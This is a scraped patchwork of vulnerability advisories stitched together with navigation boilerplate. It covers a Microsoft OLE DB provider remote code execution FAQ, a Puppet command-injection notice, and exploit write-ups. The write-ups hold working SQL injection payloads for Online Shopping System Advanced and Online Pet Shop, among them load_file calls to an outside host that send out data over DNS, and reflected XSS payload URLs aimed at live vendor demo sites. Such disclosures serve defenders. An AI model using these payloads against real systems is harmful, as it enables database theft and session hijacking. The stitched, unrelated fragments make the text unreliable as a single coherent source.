**How could an attacker exploit this vulnerability?**

An attacker could exploit the vulnerability by tricking an authenticated user into attempting to connect to a malicious SQL server via OLEDB, which could result in the server receiving a malicious networking packet. This could allow the attacker to execute code remotely on the client.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220808**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220808)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-38031: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2022-37982: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

Online Shopping System Advanced version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    The online-shopping-system-advanced-1.0 suffers from multiple SQLiThe attacker can steal all information from the database of this system.Status: CRITICAL[+] Exploit:```MYSQLParameter: cid (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''OR NOT 4084=4084 AND 'icSi'='icSi    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#```--------------------------------------------------------------------------------------------```MYSQLParameter: password (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on````--------------------------------------------------------------------------------------------```MYSQL```## And more:```txt[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php[password parameter]][1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php[email parameter]][1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [nameparameter]]```PoC:https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Online Shopping System Advanced 1.0 SQL Injection

WordPress eCommerce Product Catalog plugin version 3.0.70 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/ecommerce-product-catalog/                           ││  Vendor   : impleCode - implecode.com                                                  ││  Software : WordPress eCommerce Product Catalog 3.0.70                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'product_category' is vulnerable to XSSPath: /product-category/clothing/sunglasses/men/ https://demo.implecode.com/product-category/clothing/sunglasses/men/?product_category=40&gr0ln%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ewop2e=1[-] Done

WordPress eCommerce Product Catalog 3.0.70 Cross Site Scripting

WordPress / Joomla JReviews extension version 4.1.5 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : ClickFWD LLC. - jreviews.com                                               ││  Software : WordPress JReviews 4.1.5                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'listview' is vulnerable to XSSPath: /top-user-rated-listings https://wp-demo.jreviews.com/top-user-rated-listings?listview=2&qrrwx%22%3e%3cscript%3ealert(1)%3c%2fscript%3et16n9=1URL parameter 'format' is vulnerable to XSSPath: /advanced-search/search-resultshttps://wp-demo.jreviews.com/advanced-search/search-results?pg=2&order=featured&query=all&format=raw&mzh9g%22%3e%3cscript%3ealert(1)%3c%2fscript%3ei8emo=1[-] Done

WordPress / Joomla JReviews 4.1.5 Cross Site Scripting

Joomla Vik Rent Car extension version 1.14 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Rent Car 1.14                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘parameter 'returnplace' is vulnerable to XSSPath: index.php/en/search-your-car https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continueparameter 'categories' is vulnerable to XSSPath: index.php/en/search-your-carhttps://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue[-] Done

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 3 – 9)

ZKteco ZKBioSecurity V5000 4.1.3 was discovered to contain a SQL injection vulnerability via the component /baseOpLog.do.

CVE-2022-36635

Command injection is possible in the puppetlabs-mysql module prior to version 13.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise.

*   Forge
*   Documentation
*   Get Support
*   Education
*   Events
*   Shop

BlogContact Sales

Try Puppet 

*   Why Puppet
*   Products
*   Services
*   Open Source
*   Resources
*   Partners
*   About Puppet by Perforce

*   Why Puppet
*   Products
*   Services
*   Open Source
*   Resources
*   Partners
*   About Puppet by Perforce
*   
*   Forge
*   Documentation
*   Get Support
*   Education
*   Events
*   Shop

Search Puppet.com

Puppet is the industry standard for IT automation.

Modernize, manage and bring your hybrid infrastructure into compliance through Puppet's powerful continuous automation.

*   Why Puppet 
*   Try Puppet 

**Guidebook**

*   What is Configuration Management
*   What is IT Compliance
*   What is IT Automation

**Use Cases**

*   Application delivery & operations
*   Continuous configuration automation
*   Continuous compliance
*   Continuous delivery
*   Patch management
*   Puppet for government
*   IT process automation & orchestration
*   Windows infrastructure automation

**Get Puppet Enterprise**

First 10 nodes are free!

*   Try it now 
*   Request a demo 

**Products**

*   Puppet Enterprise
*   Continuous Delivery for Puppet Enterprise
*   Puppet Comply

**Pricing & Packaging**

*   Pricing
*   Support services plans
*   Professional services

**Integrations**

*   Amazon Web Services
*   Google Cloud Platform
*   Hashicorp
*   PowerShell DSC
*   Windows Azure
*   ServiceNow
*   Splunk
*   VMware
*   All integrations

**Puppet Education**

Puppet Education is your learning portal for tools and best practices to address common business challenges.

*   Puppet Education 

**Professional services**

*   Start automating
*   Accelerate delivery
*   Integrate your toolchain
*   Harden infrastructure
*   Partner for success
*   Scale DevOps
*   All professional services

**Support**

*   Puppet support
*   Technical support packages
*   Technical account management

**Custom consulting services**

Get up and running quickly with a custom solution that addresses your unique business goals and easily allows for growth as your needs evolve.

*   Learn more 

**Puppet Forge**

Find thousands of component modules built by the community and guidance on using them in your own infrastructure.

*   Visit Puppet Forge 

**Ecosystem**

*   Puppet developer experience
*   Trusted contributors
*   GitHub
*   Vox Pupuli

**Open Source Projects**

*   Open source Puppet
*   Bolt
*   All open source projects
*   Compare our enterprise products

**Community**

*   Community
*   Puppet Champions
*   Puppet Test Pilots
*   Community calendar
*   Community Slack
*   Pulling the Strings Podcast
*   Puppet and Perforce Community FAQ

**Contribute**

*   Contribute written content
*   Contribute to open source projects
*   Puppet Idea Portal

**State of DevOps Report**

Since launching our first DevOps survey in 2012, we’ve learned a lot about the power of DevOps to transform organizations.

*   State of DevOps retrospective
*   Scaling DevOps

*   Get the 2021 State of DevOps Report 

**Product Documentation**

*   Puppet Enterprise
*   Continuous Delivery for Puppet Enterprise
*   Puppet Comply
*   Puppet Remediate
*   All documentation

**Resource library**

*   Blog
*   Ebooks
*   Reports
*   Solution briefs
*   Videos
*   Webinars
*   White papers

**Customers**

*   Our customers
*   Customer videos
*   Customer stories

**Partners**

*   Technology partners
*   Channel partners
*   Solution providers
*   Become a partner
*   Partner Portal login

**Featured Partners**

**About Us**

Puppet automates your infrastructure so you can innovate. We find, fix, and predict in order to prevent surprises and maintain your desired state.

**Puppet by Perforce**

*   Mission
*   Diversity, equity & inclusion
*   Contact Us

**Working at Puppet by Perforce**

*   Open positions

**Press & news**

*   Press room
*   Press releases
*   News mentions

**Events**

It's our community that makes Puppet great. Connect with Puppet users and employees.

*   Watch On Demand: Puppetize Digital 2021
*   All events

*   **Posted 2022-10-03**
*   **Assessed Risk Level: High**
*   **CVSS 3.1 Base Score: 8.4**

Command injection is possible in the puppetlabs-mysql module prior to version 13.0.0. A malicious actor is able to exploit this vulnerability only if they are able to provide unsanitized input to the module. This condition is rare in most deployments of Puppet and Puppet Enterprise.

**Status:**

**Affected software versions:**

*   Puppetlabs-mysql Module <13.0.0

**Resolved in:**

*   Puppetlabs-mysql Module 13.0.0

CVE-2022-3276: CVE-2022-3276 - Puppetlabs-mysql Command Injection

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /pet_shop/admin/?page=maintenance/manage_category.

Permalink

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: hegeoo

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=maintenance/manage\_category&id=

Vulnerability location: /pet\_shop/admin/?page=maintenance/manage\_category&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=maintenance/manage\_category&id=4%27%20and%20length(database())%20=11--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=maintenance/manage\_category&id\=4%27%20and%20length(database())%20\=11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close

length=11 

length=12

Tag

#sql